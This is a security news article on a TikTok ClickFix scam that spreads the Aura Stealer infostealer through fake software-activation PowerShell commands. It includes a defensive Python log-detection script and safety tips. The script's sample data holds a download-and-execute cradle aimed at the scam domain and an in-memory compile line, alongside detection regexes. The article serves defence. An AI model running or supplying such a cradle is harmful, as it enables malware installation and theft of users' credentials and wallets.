Cybercriminals are increasingly exploiting TikTok as a platform to ensnare unsuspecting users. Their latest tactic involves disguising malicious downloads as free activation guides for widely used software, including Windows, Microsoft 365, and Photoshop, and even as fake premium versions of popular streaming services like Netflix and Spotify. Security expert Xavier Mertens first identified this troubling campaign, which mirrors a similar scheme observed earlier this year. Reports from BleepingComputer indicate that these deceptive TikTok videos showcase brief PowerShell commands, misleading viewers into executing them as administrators to “activate” or “fix” their software.
In truth, these commands redirect users to a malicious website, subsequently downloading malware known as Aura Stealer. This insidious program stealthily extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s device.
How the TikTok scam works
This operation employs a method referred to as a ClickFix attack, a form of social engineering designed to make victims believe they are following legitimate technical instructions. The process appears straightforward: execute a simple command and gain immediate access to premium software. However, rather than activating any software, the PowerShell command contacts a remote domain, slmgr[.]win, which in turn retrieves harmful executables hosted on Cloudflare. The primary file, updater.exe, is a variant of the Aura Stealer malware. Once it infiltrates a system, it seeks out user credentials and transmits them back to the attacker.
Another file, source.exe, utilizes Microsoft’s C# compiler to execute code directly in memory, complicating detection efforts. While the exact purpose of this additional payload remains unclear, its pattern aligns with previous malware used for cryptocurrency theft and ransomware deployment.
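The command pattern described above leaves a trace in PowerShell script-block logging (Event ID 4104), which is where defenders can catch it. The following is an added detection example, not code from the original report or from the researchers it cites; the log entries are constructed samples, and the regex rules and the slmgr.win blocklist entry are assumptions chosen to match the behaviours the article names (a download cradle, in-memory C# compilation, a known domain).

```python
import re

# Constructed sample ScriptBlock-logging entries (PowerShell Event ID 4104 text),
# built for this example rather than taken from any real incident.
SAMPLE_SCRIPT_BLOCKS = [
    # A ClickFix-style "activation" one-liner of the shape the article describes
    'iex (iwr "https://slmgr[.]win/activate" -UseBasicParsing).Content',
    # A follow-on stage compiling C# in memory instead of dropping an exe
    'Add-Type -TypeDefinition $src; [Stage2.Runner]::Start()',
    # Ordinary admin activity that must not trigger
    'Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object',
    'Invoke-WebRequest -Uri https://www.microsoft.com -OutFile page.html',
]

# The only domain named in the article's report; extend from your own intel feed.
KNOWN_BAD_DOMAINS = {"slmgr.win"}

EXEC_TOKENS = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH_TOKENS = re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)
COMPILE_TOKENS = re.compile(r"\b(add-type|csc\.exe|compileassemblyfromsource)\b", re.I)
EVASION_FLAGS = re.compile(r"-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass|w(indowstyle)?\s+hidden)\b", re.I)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def refang(text):
    """Undo the [.] / hxxp defanging used in reports so hosts compare cleanly."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def analyze(script_block):
    """Return the list of rule names a single script block trips (empty if clean)."""
    text = refang(script_block)
    hits = []
    # A fetch wrapped in or piped into an expression evaluator is the classic cradle;
    # a download on its own (e.g. with -OutFile) is normal admin behaviour.
    if EXEC_TOKENS.search(text) and FETCH_TOKENS.search(text):
        hits.append("download_cradle")
    if COMPILE_TOKENS.search(text):
        hits.append("in_memory_compile")
    if EVASION_FLAGS.search(text):
        hits.append("evasion_flags")
    hosts = {h.lower() for h in URL_HOST.findall(text)}
    if hosts & KNOWN_BAD_DOMAINS:
        hits.append("known_bad_domain")
    return hits

def triage(script_blocks):
    """Map each suspicious block to its hits, dropping blocks with no findings."""
    return {b: analyze(b) for b in script_blocks if analyze(b)}

if __name__ == "__main__":
    for block, hits in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{', '.join(hits):40} {block}")
```

Feed it the ScriptBlockText field exported from the Microsoft-Windows-PowerShell/Operational log; the two benign samples show that a plain Invoke-WebRequest with -OutFile does not fire on its own.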
How to stay safe from TikTok malware scams
Despite the convincing nature of these scams, users can protect themselves by adhering to a few essential precautions:
1) Avoid shortcuts
Refrain from copying or executing PowerShell commands from TikTok videos or unfamiliar websites. If an offer promises free access to premium software, it is likely a scam.
2) Use trusted sources
Always download or activate software directly from official websites or reputable app stores.
3) Keep security tools updated
Ensure that your antivirus software and browsers are up to date, as outdated versions may fail to detect the latest threats.
4) Use strong antivirus software
Invest in robust antivirus software that provides real-time scanning and protection against trojans, info-stealers, and phishing attempts. This is crucial for safeguarding your devices and personal information.
5) Sign up for a data removal service
If your personal data is compromised, a data removal or monitoring service can notify you and assist in eliminating sensitive information from the web. While no service can guarantee complete data removal, these services actively monitor and erase personal information from numerous websites, enhancing your privacy.
6) Reset credentials
If you have followed dubious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.
7) Use unique passwords
Utilize unique passwords for each account and consider employing a password manager to securely store and generate complex passwords, minimizing the risk of password reuse.
8) Enable multi-factor authentication
Add an extra layer of security by activating multi-factor authentication wherever possible. This ensures that even if your passwords are compromised, attackers will be unable to access your accounts without additional verification.
As TikTok continues to grow in popularity, it becomes an attractive target for scams like these. Users must remain vigilant, trust only verified sources, and recognize that shortcuts to free software often come with hidden costs to their security and peace of mind.